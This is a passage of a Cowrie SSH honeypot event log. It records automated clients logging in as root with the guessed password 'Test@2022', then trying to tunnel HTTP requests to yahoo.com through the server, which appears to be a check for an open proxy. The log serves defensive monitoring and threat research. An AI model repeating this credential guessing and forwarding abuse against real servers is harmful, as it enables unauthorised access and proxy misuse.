rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:02.443670Z","src_ip":"213.209.150.239","session":"ebc64099779c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:02.725384Z","src_ip":"213.209.150.239","session":"ebc64099779c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":20504,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:20504","sensor":"my-vps","timestamp":"2025-08-26T00:59:02.783443Z","session":"ebc64099779c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:02.840053Z","src_ip":"213.209.150.239","session":"ebc64099779c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":15889,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:15889","sensor":"my-vps","timestamp":"2025-08-26T00:59:02.995016Z","session":"ebc64099779c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:03.052138Z","src_ip":"213.209.150.239","session":"ebc64099779c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:03.109467Z","src_ip":"213.209.150.239","session":"ebc64099779c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":2767,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f0468395824","protocol":"ssh","message":"New connection: 213.209.150.239:2767 (1.2.3.4:22) [session: 8f0468395824]","sensor":"my-vps","timestamp":"2025-08-26T00:59:03.156022Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:03.157232Z","src_ip":"213.209.150.239","session":"8f0468395824"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:03.204504Z","src_ip":"213.209.150.239","session":"8f0468395824"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:03.439881Z","src_ip":"213.209.150.239","session":"8f0468395824"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":8078,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:8078","sensor":"my-vps","timestamp":"2025-08-26T00:59:03.488086Z","session":"8f0468395824"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:03.535783Z","src_ip":"213.209.150.239","session":"8f0468395824"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":19153,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:19153","sensor":"my-vps","timestamp":"2025-08-26T00:59:03.673584Z","session":"8f0468395824"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:03.720747Z","src_ip":"213.209.150.239","session":"8f0468395824"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:03.769179Z","src_ip":"213.209.150.239","session":"8f0468395824"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":2811,"dst_ip":"1.2.3.4","dst_port":22,"session":"5007aab1e8c3","protocol":"ssh","message":"New connection: 213.209.150.239:2811 (1.2.3.4:22) [session: 5007aab1e8c3]","sensor":"my-vps","timestamp":"2025-08-26T00:59:03.815202Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:03.816202Z","src_ip":"213.209.150.239","session":"5007aab1e8c3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:03.863377Z","src_ip":"213.209.150.239","session":"5007aab1e8c3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:04.098649Z","src_ip":"213.209.150.239","session":"5007aab1e8c3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":32185,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:32185","sensor":"my-vps","timestamp":"2025-08-26T00:59:04.146816Z","session":"5007aab1e8c3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:04.194208Z","src_ip":"213.209.150.239","session":"5007aab1e8c3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":26140,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:26140","sensor":"my-vps","timestamp":"2025-08-26T00:59:04.329579Z","session":"5007aab1e8c3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:04.376752Z","src_ip":"213.209.150.239","session":"5007aab1e8c3"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:04.425641Z","src_ip":"213.209.150.239","session":"5007aab1e8c3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":2853,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf740762ed02","protocol":"ssh","message":"New connection: 213.209.150.239:2853 (1.2.3.4:22) [session: bf740762ed02]","sensor":"my-vps","timestamp":"2025-08-26T00:59:04.471665Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:04.472281Z","src_ip":"213.209.150.239","session":"bf740762ed02"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:04.519416Z","src_ip":"213.209.150.239","session":"bf740762ed02"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:04.754041Z","src_ip":"213.209.150.239","session":"bf740762ed02"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":19007,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:19007","sensor":"my-vps","timestamp":"2025-08-26T00:59:04.802234Z","session":"bf740762ed02"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:04.849448Z","src_ip":"213.209.150.239","session":"bf740762ed02"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":14817,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:14817","sensor":"my-vps","timestamp":"2025-08-26T00:59:04.985383Z","session":"bf740762ed02"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:05.032614Z","src_ip":"213.209.150.239","session":"bf740762ed02"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:05.080601Z","src_ip":"213.209.150.239","session":"bf740762ed02"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":2905,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec1c58b2197b","protocol":"ssh","message":"New connection: 213.209.150.239:2905 (1.2.3.4:22) [session: ec1c58b2197b]","sensor":"my-vps","timestamp":"2025-08-26T00:59:05.126896Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:05.135779Z","src_ip":"213.209.150.239","session":"ec1c58b2197b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:05.174722Z","src_ip":"213.209.150.239","session":"ec1c58b2197b"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T00:59:05.402805Z","src_ip":"120.79.98.154","session":"76b9300de415"}
{"eventid":"cowrie.session.closed","duration":"49.1","message":"Connection lost after 49.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:05.404900Z","src_ip":"120.79.98.154","session":"76b9300de415"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:05.409499Z","src_ip":"213.209.150.239","session":"ec1c58b2197b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":13477,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:13477","sensor":"my-vps","timestamp":"2025-08-26T00:59:05.457320Z","session":"ec1c58b2197b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:05.504763Z","src_ip":"213.209.150.239","session":"ec1c58b2197b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":22768,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:22768","sensor":"my-vps","timestamp":"2025-08-26T00:59:05.649717Z","session":"ec1c58b2197b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:05.696978Z","src_ip":"213.209.150.239","session":"ec1c58b2197b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:05.744919Z","src_ip":"213.209.150.239","session":"ec1c58b2197b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":2933,"dst_ip":"1.2.3.4","dst_port":22,"session":"94586c2cac73","protocol":"ssh","message":"New connection: 213.209.150.239:2933 (1.2.3.4:22) [session: 94586c2cac73]","sensor":"my-vps","timestamp":"2025-08-26T00:59:05.791399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:05.792486Z","src_ip":"213.209.150.239","session":"94586c2cac73"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-g